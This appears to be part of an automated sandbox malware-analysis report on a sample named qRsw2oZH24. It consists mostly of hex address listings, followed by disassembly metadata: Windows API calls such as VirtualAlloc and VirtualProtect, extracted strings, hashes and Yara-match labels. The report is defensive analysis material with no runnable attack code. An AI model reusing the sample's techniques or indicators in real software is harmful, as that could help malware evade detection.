                                    0x00821175
                                    0x00821185
                                    0x0082118a
                                    0x00821190
                                    0x00821193
                                    0x0082119b
                                    0x008211a2
                                    0x008211a9
                                    0x008211ab
                                    0x008211ad
                                    0x008211ad
                                    0x008211b2
                                    0x008211b6
                                    0x008211b6
                                    0x008211bc
                                    0x00000000
                                    0x00000000
                                    0x008211c4
                                    0x008211ca
                                    0x008211ce
                                    0x008211d3
                                    0x008211d5
                                    0x008215ee
                                    0x008215ee
                                    0x00821607
                                    0x0082160a
                                    0x0082160e
                                    0x00821616
                                    0x0082161b
                                    0x0082162d
                                    0x00821637
                                    0x0082163d
                                    0x0082163f
                                    0x00821643
                                    0x0082164f
                                    0x00821657
                                    0x0082165c
                                    0x00821664
                                    0x0082166f
                                    0x0082167a
                                    0x00821685
                                    0x00821690
                                    0x008216a2
                                    0x008216a7
                                    0x008216ad
                                    0x008216b3
                                    0x008216b9
                                    0x008216bf
                                    0x008216c5
                                    0x008216d8
                                    0x008216dd
                                    0x008216e3
                                    0x008216e6
                                    0x008216ee
                                    0x008216f4
                                    0x008216fa
                                    0x008216fc
                                    0x008216fe
                                    0x008216fe
                                    0x00821703
                                    0x00821707
                                    0x00821707
                                    0x00821709
                                    0x00000000
                                    0x00000000
                                    0x0082170f
                                    0x00821718
                                    0x0082171e
                                    0x0082172a
                                    0x0082172e
                                    0x00821734
                                    0x00821739
                                    0x00821743
                                    0x0082174a
                                    0x00821755
                                    0x00821757
                                    0x0082175f
                                    0x00821763
                                    0x00821768
                                    0x0082176a
                                    0x00821ac2
                                    0x00821ac8
                                    0x00821acd
                                    0x00821ad3
                                    0x00000000
                                    0x00821ad3
                                    0x00821770
                                    0x0082177c
                                    0x00821788
                                    0x00821794
                                    0x00821798
                                    0x008217a3
                                    0x008217a7
                                    0x008217ac
                                    0x008217b8
                                    0x008217c4
                                    0x008217c9
                                    0x008217d1
                                    0x008217d8
                                    0x008217e0
                                    0x008217e6
                                    0x008217e9
                                    0x008217f5
                                    0x00821801
                                    0x00821805
                                    0x0082180a
                                    0x00821812
                                    0x0082181c
                                    0x0082182a
                                    0x00821835
                                    0x00821840
                                    0x00821844
                                    0x00821849
                                    0x0082184b
                                    0x00821ac0
                                    0x00821ac0
                                    0x00821ac0
                                    0x00000000
                                    0x00821ac0
                                    0x00821851
                                    0x00821864
                                    0x00821866
                                    0x0082186e
                                    0x00821873
                                    0x0082187a
                                    0x00821881
                                    0x00821886
                                    0x0082188c
                                    0x0082189b
                                    0x0082189e
                                    0x008218a3
                                    0x008218a8
                                    0x008218af
                                    0x008218b6
                                    0x008218c1
                                    0x008218c4
                                    0x008218ce
                                    0x008218d5
                                    0x008218db
                                    0x008218dd
                                    0x008218e2
                                    0x008218e8
                                    0x008218ef
                                    0x008218f4
                                    0x008218fb
                                    0x008218fc
                                    0x008218fe
                                    0x00821901
                                    0x0082190f
                                    0x00821915
                                    0x0082191a
                                    0x00821921
                                    0x00821926
                                    0x008218fc
                                    0x00821927
                                    0x0082192e
                                    0x0082193f
                                    0x0082193f
                                    0x00821944
                                    0x0082194b
                                    0x00821952
                                    0x00821958
                                    0x0082195f
                                    0x00821964
                                    0x0082196c
                                    0x0082196e
                                    0x00821971
                                    0x00821979
                                    0x0082197e
                                    0x00821984
                                    0x00821989
                                    0x00821990
                                    0x00821995
                                    0x0082196c
                                    0x00821996
                                    0x0082199d
                                    0x008219ae
                                    0x008219be
                                    0x008219cb
                                    0x008219d5
                                    0x008219e1
                                    0x008219f0
                                    0x008219f8
                                    0x008219fe
                                    0x00821a0c
                                    0x00821a16
                                    0x00821a22
                                    0x00821a26
                                    0x00821a27
                                    0x00821a28
                                    0x00821a2b
                                    0x00821a2e
                                    0x00821a33
                                    0x00821a39
                                    0x00821a3c
                                    0x00821a43
                                    0x00821a47
                                    0x00821a48
                                    0x00821a4c
                                    0x00821a4d
                                    0x00821a54
                                    0x00821a59
                                    0x00821a5f
                                    0x00821a6a
                                    0x00821a75
                                    0x00821a80
                                    0x00821a8b
                                    0x00821a96
                                    0x00821aa1
                                    0x00821aac
                                    0x00821ab7
                                    0x00821abb
                                    0x00000000
                                    0x0082199f
                                    0x0082199f
                                    0x0082199f
                                    0x008219a1
                                    0x008219a1
                                    0x008219a8
                                    0x008219a9
                                    0x008219a9
                                    0x00000000
                                    0x008219a1
                                    0x00821930
                                    0x00821930
                                    0x00821930
                                    0x00821932
                                    0x00821932
                                    0x00821939
                                    0x0082193a
                                    0x0082193a
                                    0x00000000
                                    0x00821932
                                    0x0082192e
                                    0x00821ade
                                    0x00821ae0
                                    0x00821ae4
                                    0x00821ae4
                                    0x00821ae9
                                    0x00821aef
                                    0x00821af1
                                    0x00821af3
                                    0x00821af3
                                    0x00821afb
                                    0x00821b02
                                    0x00821b07
                                    0x00821b0a
                                    0x00821b0d
                                    0x00000000
                                    0x00821b0d
                                    0x008211db
                                    0x008211e5
                                    0x008211ee
                                    0x008211fa
                                    0x008211fe
                                    0x00821209
                                    0x0082120d
                                    0x00821212
                                    0x0082121f
                                    0x0082122b
                                    0x00821230
                                    0x00821231
                                    0x0082123b
                                    0x00821242
                                    0x00821249
                                    0x00821250
                                    0x00821252
                                    0x00821257
                                    0x0082125d
                                    0x00821260
                                    0x00821266
                                    0x0082126d
                                    0x00821272
                                    0x00821279
                                    0x0082127a
                                    0x00821289
                                    0x0082128a
                                    0x0082128b
                                    0x0082128c
                                    0x0082128e
                                    0x00821293
                                    0x0082129a
                                    0x0082129f
                                    0x008212a2
                                    0x008212a2
                                    0x0082127a
                                    0x008212a3
                                    0x008212aa
                                    0x008212bb
                                    0x008212bb
                                    0x008212bc
                                    0x008212bc
                                    0x008212c5
                                    0x008212ce
                                    0x008212d3
                                    0x008212e5
                                    0x008212ef
                                    0x008212f5
                                    0x00821302
                                    0x0082130a
                                    0x0082130e
                                    0x00821313
                                    0x0082131b
                                    0x00821325
                                    0x00821333
                                    0x0082133e
                                    0x00821349
                                    0x00821354
                                    0x00821358
                                    0x0082135d
                                    0x0082135f
                                    0x008215eb
                                    0x008215eb
                                    0x00000000
                                    0x008215eb
                                    0x00821365
                                    0x00821372
                                    0x00821377
                                    0x0082137e
                                    0x00821388
                                    0x00821392
                                    0x0082139c
                                    0x008213a5
                                    0x008213ab
                                    0x008213b2
                                    0x008213b7
                                    0x008213be
                                    0x008213bf
                                    0x008213d1
                                    0x008213d2
                                    0x008213d3
                                    0x008213d4
                                    0x008213d6
                                    0x008213db
                                    0x008213e2
                                    0x008213e7
                                    0x008213ed
                                    0x008213f0
                                    0x008213bf
                                    0x008213f1
                                    0x008213f8
                                    0x00821409
                                    0x0082140f
                                    0x00821412
                                    0x00821417
                                    0x0082141e
                                    0x00821425
                                    0x0082142d
                                    0x00821433
                                    0x00821436
                                    0x0082143a
                                    0x0082143f
                                    0x00821446
                                    0x0082144c
                                    0x00821452
                                    0x00821459
                                    0x0082145e
                                    0x00821465
                                    0x00821466
                                    0x00821468
                                    0x0082146b
                                    0x00821479
                                    0x0082147f
                                    0x00821484
                                    0x0082148b
                                    0x00821490
                                    0x00821466
                                    0x00821491
                                    0x00821498
                                    0x008214a9
                                    0x008214a9
                                    0x008214ae
                                    0x008214b5
                                    0x008214bc
                                    0x008214c2
                                    0x008214c9
                                    0x008214ce
                                    0x008214d6
                                    0x008214d8
                                    0x008214db
                                    0x008214e3
                                    0x008214e8
                                    0x008214ee
                                    0x008214f3
                                    0x008214fa
                                    0x008214ff
                                    0x008214d6
                                    0x00821500
                                    0x00821507
                                    0x00821518
                                    0x00821528
                                    0x00821535
                                    0x0082153f
                                    0x0082154b
                                    0x0082155a
                                    0x0082155f
                                    0x00821565
                                    0x00821573
                                    0x0082157d
                                    0x00821582
                                    0x00821583
                                    0x00821587
                                    0x0082158b
                                    0x0082158d
                                    0x0082158d
                                    0x00821590
                                    0x00821591
                                    0x0082159a
                                    0x0082159f
                                    0x008215a8
                                    0x008215b3
                                    0x008215be
                                    0x008215c9
                                    0x008215d4
                                    0x008215df
                                    0x008215e4
                                    0x00000000
                                    0x00821509
                                    0x00821509
                                    0x00821509
                                    0x0082150b
                                    0x0082150b
                                    0x00821512
                                    0x00821513
                                    0x00821513
                                    0x00000000
                                    0x0082150b
                                    0x0082149a
                                    0x0082149a
                                    0x0082149a
                                    0x0082149c
                                    0x0082149c
                                    0x008214a3
                                    0x008214a4
                                    0x008214a4
                                    0x00000000
                                    0x0082149c
                                    0x008213fa
                                    0x008213fa
                                    0x008213fa
                                    0x008213fc
                                    0x008213fc
                                    0x00821403
                                    0x00821404
                                    0x00821404
                                    0x00000000
                                    0x008213fc
                                    0x008212ac
                                    0x008212ac
                                    0x008212ac
                                    0x008212ae
                                    0x008212ae
                                    0x008212b5
                                    0x008212b6
                                    0x008212b6
                                    0x00000000
                                    0x008212ae
                                    0x008212aa
                                    0x00821b1b
                                    0x00821b1d
                                    0x00821b21
                                    0x00821b21
                                    0x00821b26
                                    0x00821b2c
                                    0x00821b2e
                                    0x00821b30
                                    0x00821b30
                                    0x00000000
                                    0x00821b2e
                                    0x00821090
                                    0x00821090
                                    0x00821090
                                    0x00821092
                                    0x00821092
                                    0x00821099
                                    0x0082109a
                                    0x0082109a
                                    0x00000000
                                    0x00821092
                                    0x008205e4
                                    0x008205e4
                                    0x008205f4
                                    0x008205fc
                                    0x00820607
                                    0x0082060f
                                    0x00820621
                                    0x00820626
                                    0x0082062c
                                    0x00820632
                                    0x00820635
                                    0x00820638
                                    0x00820648
                                    0x0082064d
                                    0x00820653
                                    0x00820656
                                    0x0082065e
                                    0x00820665
                                    0x0082066e
                                    0x00820670
                                    0x00820670
                                    0x00820675
                                    0x00820683
                                    0x00820686
                                    0x00820691
                                    0x00820ab9
                                    0x00820ab9
                                    0x00820ad8
                                    0x00820adb
                                    0x00820adf
                                    0x00820ae7
                                    0x00820aef
                                    0x00820af4
                                    0x00820af7
                                    0x00820b05
                                    0x00820b0f
                                    0x00820b15
                                    0x00820b17
                                    0x00820b1b
                                    0x00820b27
                                    0x00820b2f
                                    0x00820b34
                                    0x00820b3c
                                    0x00820b47
                                    0x00820b52
                                    0x00820b5d
                                    0x00820b68
                                    0x00820b7a
                                    0x00820b7f
                                    0x00820b85
                                    0x00820b8b
                                    0x00820b91
                                    0x00820b97
                                    0x00820b9d
                                    0x00820bb0
                                    0x00820bb5
                                    0x00820bbb
                                    0x00820bbe
                                    0x00820bc3
                                    0x00820bc6
                                    0x00820bcb
                                    0x00820bcd
                                    0x00820bcd
                                    0x00820bd2
                                    0x00820bd6
                                    0x00820bde
                                    0x00820be7
                                    0x00820bed
                                    0x00820bf9
                                    0x00820bfd
                                    0x00820c03
                                    0x00820c12
                                    0x00820c19
                                    0x00820c24
                                    0x00820c26
                                    0x00820c2e
                                    0x00820c32
                                    0x00820c39
                                    0x00820f9d
                                    0x00820fa3
                                    0x00820fa8
                                    0x00820fae
                                    0x00000000
                                    0x00820fae
                                    0x00820c3f
                                    0x00820c4b
                                    0x00820c57
                                    0x00820c63
                                    0x00820c67
                                    0x00820c72
                                    0x00820c76
                                    0x00820c7b
                                    0x00820c87
                                    0x00820c90
                                    0x00820c95
                                    0x00820c9d
                                    0x00820ca4
                                    0x00820cac
                                    0x00820cb1
                                    0x00820cb4
                                    0x00820cb7
                                    0x00820cc3
                                    0x00820ccf
                                    0x00820cd3
                                    0x00820cd8
                                    0x00820cdd
                                    0x00820ce7
                                    0x00820cf5
                                    0x00820d00
                                    0x00820d08
                                    0x00820d0c
                                    0x00820d13
                                    0x00820f9b
                                    0x00820f9b
                                    0x00000000
                                    0x00820f9b
                                    0x00820d2c
                                    0x00820d2e
                                    0x00820d36
                                    0x00820d3c
                                    0x00820d41
                                    0x00820d48
                                    0x00820d4f
                                    0x00820d57
                                    0x00820d5a
                                    0x00820d66
                                    0x00820d69
                                    0x00820d6e
                                    0x00820d73
                                    0x00820d7a
                                    0x00820d81
                                    0x00820d86
                                    0x00820d89
                                    0x00820d8c
                                    0x00820d96
                                    0x00820da0
                                    0x00820da9
                                    0x00820db0
                                    0x00820db2
                                    0x00820dbd
                                    0x00820dc4
                                    0x00820dc9
                                    0x00820dd0
                                    0x00820dd1
                                    0x00820de3
                                    0x00820de4
                                    0x00820de6
                                    0x00820de7
                                    0x00820dec
                                    0x00820df3
                                    0x00820df8
                                    0x00820dfe
                                    0x00820e01
                                    0x00820dd1
                                    0x00820e09
                                    0x00820e1a
                                    0x00820e1a
                                    0x00820e1f
                                    0x00820e26
                                    0x00820e33
                                    0x00820e3a
                                    0x00820e3f
                                    0x00820e47
                                    0x00820e49
                                    0x00820e4c
                                    0x00820e54
                                    0x00820e59
                                    0x00820e5f
                                    0x00820e64
                                    0x00820e6b
                                    0x00820e70
                                    0x00820e47
                                    0x00820e71
                                    0x00820e73
                                    0x00820e79
                                    0x00820e8a
                                    0x00820e9a
                                    0x00820ea7
                                    0x00820eb1
                                    0x00820ebd
                                    0x00820ecc
                                    0x00820ed1
                                    0x00820ed7
                                    0x00820ee5
                                    0x00820eef
                                    0x00820efb
                                    0x00820eff
                                    0x00820f00
                                    0x00820f01
                                    0x00820f04
                                    0x00820f07
                                    0x00820f0c
                                    0x00820f12
                                    0x00820f15
                                    0x00820f1c
                                    0x00820f20
                                    0x00820f21
                                    0x00820f25
                                    0x00820f26
                                    0x00820f2d
                                    0x00820f32
                                    0x00820f38
                                    0x00820f43
                                    0x00820f4e
                                    0x00820f59
                                    0x00820f64
                                    0x00820f6f
                                    0x00820f7a
                                    0x00820f85
                                    0x00820f90
                                    0x00820f94
                                    0x00000000
                                    0x00820e7b
                                    0x00820e7b
                                    0x00820e7d
                                    0x00820e7d
                                    0x00820e84
                                    0x00820e85
                                    0x00820e85
                                    0x00000000
                                    0x00820e7d
                                    0x00820e0b
                                    0x00820e0b
                                    0x00820e0d
                                    0x00820e0d
                                    0x00820e14
                                    0x00820e15
                                    0x00000000
                                    0x00820e0d
                                    0x00820e09
                                    0x00820fb9
                                    0x00820fbb
                                    0x00820fbf
                                    0x00820fbf
                                    0x00820fc4
                                    0x00820fca
                                    0x00820fcc
                                    0x00820fce
                                    0x00820fce
                                    0x00820fd3
                                    0x00820ff2
                                    0x00820ff7
                                    0x00820ffa
                                    0x00820ffd
                                    0x00000000
                                    0x00820697
                                    0x00820697
                                    0x008206a4
                                    0x008206ad
                                    0x008206b6
                                    0x008206ba
                                    0x008206c2
                                    0x008206c6
                                    0x008206cb
                                    0x008206d8
                                    0x008206e4
                                    0x008206e9
                                    0x008206ea
                                    0x008206f4
                                    0x008206fe
                                    0x00820708
                                    0x00820712
                                    0x00820714
                                    0x00820719
                                    0x00820722
                                    0x0082072b
                                    0x00820732
                                    0x00820737
                                    0x0082073e
                                    0x0082073f
                                    0x00820751
                                    0x00820752
                                    0x00820753
                                    0x00820754
                                    0x00820756
                                    0x0082075b
                                    0x00820762
                                    0x00820767
                                    0x0082076a
                                    0x0082076a
                                    0x0082073f
                                    0x00820772
                                    0x00820783
                                    0x00820783
                                    0x00820784
                                    0x00820784
                                    0x0082078d
                                    0x00820796
                                    0x0082079e
                                    0x008207a3
                                    0x008207a6
                                    0x008207b4
                                    0x008207be
                                    0x008207c4
                                    0x008207ce
                                    0x008207d6
                                    0x008207da
                                    0x008207df
                                    0x008207e7
                                    0x008207ee
                                    0x008207f9
                                    0x00820804
                                    0x0082080f
                                    0x0082081a
                                    0x0082081e
                                    0x00820825
                                    0x00820ab6
                                    0x00820ab6
                                    0x00000000
                                    0x0082082b
                                    0x00820838
                                    0x0082083d
                                    0x00820844
                                    0x0082084b
                                    0x00820852
                                    0x00820859
                                    0x00820865
                                    0x0082086c
                                    0x00820871
                                    0x00820878
                                    0x00820879
                                    0x00820888
                                    0x00820889
                                    0x0082088a
                                    0x0082088b
                                    0x0082088d
                                    0x00820892
                                    0x00820899
                                    0x0082089e
                                    0x008208a4
                                    0x008208a7
                                    0x00820879
                                    0x008208af
                                    0x008208c0
                                    0x008208c6
                                    0x008208c9
                                    0x008208ce
                                    0x008208d5
                                    0x008208dc
                                    0x008208e4
                                    0x008208e9
                                    0x008208ec
                                    0x008208ef
                                    0x008208f3
                                    0x008208f8
                                    0x00820902
                                    0x0082090b
                                    0x00820918
                                    0x0082091f
                                    0x00820924
                                    0x0082092b
                                    0x0082092c
                                    0x00820933
                                    0x0082093e
                                    0x0082093f
                                    0x00820941
                                    0x00820942
                                    0x00820947
                                    0x0082094e
                                    0x00820953
                                    0x00820956
                                    0x0082092c
                                    0x0082095e
                                    0x0082096f
                                    0x0082096f
                                    0x00820974
                                    0x0082097b
                                    0x00820988
                                    0x0082098f
                                    0x00820994
                                    0x0082099c
                                    0x0082099e
                                    0x008209a1
                                    0x008209a9
                                    0x008209ae
                                    0x008209b4
                                    0x008209b9
                                    0x008209c0
                                    0x008209c5
                                    0x0082099c
                                    0x008209cd
                                    0x008209de
                                    0x008209ee
                                    0x008209fb
                                    0x00820a05
                                    0x00820a11
                                    0x00820a20
                                    0x00820a28
                                    0x00820a2d
                                    0x00820a30
                                    0x00820a3e
                                    0x00820a48
                                    0x00820a4d
                                    0x00820a4e
                                    0x00820a52
                                    0x00820a56
                                    0x00820a58
                                    0x00820a58
                                    0x00820a5b
                                    0x00820a5c
                                    0x00820a65
                                    0x00820a6a
                                    0x00820a73
                                    0x00820a7e
                                    0x00820a89
                                    0x00820a94
                                    0x00820a9f
                                    0x00820aaa
                                    0x00820aaf
                                    0x00000000
                                    0x008209cf
                                    0x008209cf
                                    0x008209d1
                                    0x008209d1
                                    0x008209d8
                                    0x008209d9
                                    0x008209d9
                                    0x00000000
                                    0x008209d1
                                    0x00820960
                                    0x00820960
                                    0x00820962
                                    0x00820962
                                    0x00820969
                                    0x0082096a
                                    0x00000000
                                    0x00820962
                                    0x0082095e
                                    0x008208b1
                                    0x008208b3
                                    0x008208b3
                                    0x008208ba
                                    0x008208bb
                                    0x00000000
                                    0x008208b3
                                    0x00820774
                                    0x00820774
                                    0x00820776
                                    0x00820776
                                    0x0082077d
                                    0x0082077e
                                    0x0082077e
                                    0x00000000
                                    0x00820776
                                    0x00820772
                                    0x00820691
                                    0x00821005
                                    0x00821007
                                    0x0082100b
                                    0x0082100b
                                    0x00821010
                                    0x00821014
                                    0x0082101a
                                    0x0082101c
                                    0x0082101e
                                    0x0082101e
                                    0x00000000
                                    0x0082101c

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$DeallocateEnterLeave$ConditionVariableWake
                                    • String ID: .$.$=$B.$B.$\history$\history\$dOLLK\r.$dOLLK\r.$rOMMA[@Z]$rOMMA[@Z]$r~}g$r~}g$r~}gr.$r~}gr.
                                    • API String ID: 4060657020-2226889094
                                    • Opcode ID: 2bd1abf4b66dac35383439a268713f9d21aef47ae728db2c107fd9cc424423b0
                                    • Instruction ID: 10f431c5f205957c5981cfd33cda9eb11c458236e72e72678fc50647792eccba
                                    • Opcode Fuzzy Hash: 2bd1abf4b66dac35383439a268713f9d21aef47ae728db2c107fd9cc424423b0
                                    • Instruction Fuzzy Hash: D3D27A30D006A8DADF25EBA8E955BDDBBB0FF15300F2041D9E549A7292DB741AC8CF52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00851702 Relevance: 11.6, Strings: 8, Instructions: 1591COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: %z AS %s$%z ORDER BY$%z USING PRIMARY KEY$%z VIRTUAL TABLE INDEX %d:%s$%z WITH INDEX %s$:$L$TABLE %s
                                    • API String ID: 0-162927363
                                    • Opcode ID: 3d0742d3ae3f458e8ad0ffb0215e01e70d275a4b1a43a7660286f13df0650c6c
                                    • Instruction ID: 2671a8f482d7df77a63f60d3d644cad0a480b9cc7bb85a6e1dcb7c831c75d2d6
                                    • Opcode Fuzzy Hash: 3d0742d3ae3f458e8ad0ffb0215e01e70d275a4b1a43a7660286f13df0650c6c
                                    • Instruction Fuzzy Hash: 89D239716083419FDB14CF28C885A2ABBE2FFC9715F14892DF889D7291EB71D945CB82
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0088A932 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0088049B: GetLastError.KERNEL32(?,?,?,00872F7E,?,?,?,?,00873E8D,?), ref: 008804A0
                                      • Part of subcall function 0088049B: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00872F7E,?,?,?,?,00873E8D,?), ref: 0088053E
                                    • GetACP.KERNEL32(?,?,?,?,?,?,0087E6A8,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 0088A9F3
                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0087E6A8,?,?,?,00000055,?,-00000050,?,?), ref: 0088AA1E
                                    • _wcschr.LIBVCRUNTIME ref: 0088AAB2
                                    • _wcschr.LIBVCRUNTIME ref: 0088AAC0
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0088AB81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                    • String ID: utf8
                                    • API String ID: 4147378913-905460609
                                    • Opcode ID: 708a99c2dce73eb09fc7cc824f2ef25fcc456a96b4d5bbaa90b7e72850d042ff
                                    • Instruction ID: ca32b67ccf7724bdfeea59f304e45d6b73acfb60929dc0a6ce18729b2c6f111a
                                    • Opcode Fuzzy Hash: 708a99c2dce73eb09fc7cc824f2ef25fcc456a96b4d5bbaa90b7e72850d042ff
                                    • Instruction Fuzzy Hash: 3B71E231600606AAFB2CBB69CC42FAA77A9FF44710F14442BF905D71C2EB74E9418763
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0088B0BE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLocaleInfoW.KERNEL32(?,2000000B,0088B3DC,00000002,00000000,?,?,?,0088B3DC,?,00000000), ref: 0088B157
                                    • GetLocaleInfoW.KERNEL32(?,20001004,0088B3DC,00000002,00000000,?,?,?,0088B3DC,?,00000000), ref: 0088B180
                                    • GetACP.KERNEL32(?,?,0088B3DC,?,00000000), ref: 0088B195
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID: ACP$OCP
                                    • API String ID: 2299586839-711371036
                                    • Opcode ID: e73b3bfb0975f4b4b1fa3236b009ecb23b359e5f573c145f8b50093df4ffbe66
                                    • Instruction ID: 904de8cc5b5894dbbdbf3fc97693d2076658cdb7e9b112f434926f380dd909f5
                                    • Opcode Fuzzy Hash: e73b3bfb0975f4b4b1fa3236b009ecb23b359e5f573c145f8b50093df4ffbe66
                                    • Instruction Fuzzy Hash: C121BE2AB10105AADB35BF54CC29A97B3A7FFD4F64B5A8464E90ADF110E732DE41C390
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0088B293 Relevance: 7.7, APIs: 5, Instructions: 183COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0088049B: GetLastError.KERNEL32(?,?,?,00872F7E,?,?,?,?,00873E8D,?), ref: 008804A0
                                      • Part of subcall function 0088049B: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00872F7E,?,?,?,?,00873E8D,?), ref: 0088053E
                                      • Part of subcall function 0088049B: _free.LIBCMT ref: 008804FD
                                      • Part of subcall function 0088049B: _free.LIBCMT ref: 00880533
                                    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0088B39F
                                    • IsValidCodePage.KERNEL32(00000000), ref: 0088B3E8
                                    • IsValidLocale.KERNEL32(?,00000001), ref: 0088B3F7
                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0088B43F
                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0088B45E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                    • String ID:
                                    • API String ID: 949163717-0
                                    • Opcode ID: 72952554c7b3527d5da19ea83769964b00fc1d0bbbd2342aed3ddbcde6c357de
                                    • Instruction ID: 5172e80c3f6947d619907634f2487dc2ee7d12f24a4a8b367177f7eea3371937
                                    • Opcode Fuzzy Hash: 72952554c7b3527d5da19ea83769964b00fc1d0bbbd2342aed3ddbcde6c357de
                                    • Instruction Fuzzy Hash: 49516371A00615ABEB10FFA9DC41ABF77F8FF88700F144469E915EB291E7709A44CB62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 008724FE Relevance: 6.1, APIs: 4, Instructions: 83memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00872527
                                    • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0087253B
                                    • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004,?,?,?,0000001C), ref: 0087258B
                                    • VirtualProtect.KERNEL32(?,-00000001,00000104,?,?,?,0000001C), ref: 008725A0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocInfoProtectQuerySystem
                                    • String ID:
                                    • API String ID: 3562403962-0
                                    • Opcode ID: 7d9ec2ce86bd336f40c2330c90b722bcb9764cd371d2573c769c360cd63deecf
                                    • Instruction ID: 9840e2c1a2d6098b47eeb1a1c609aa29fe58f175f306603d22c79f76cdd91267
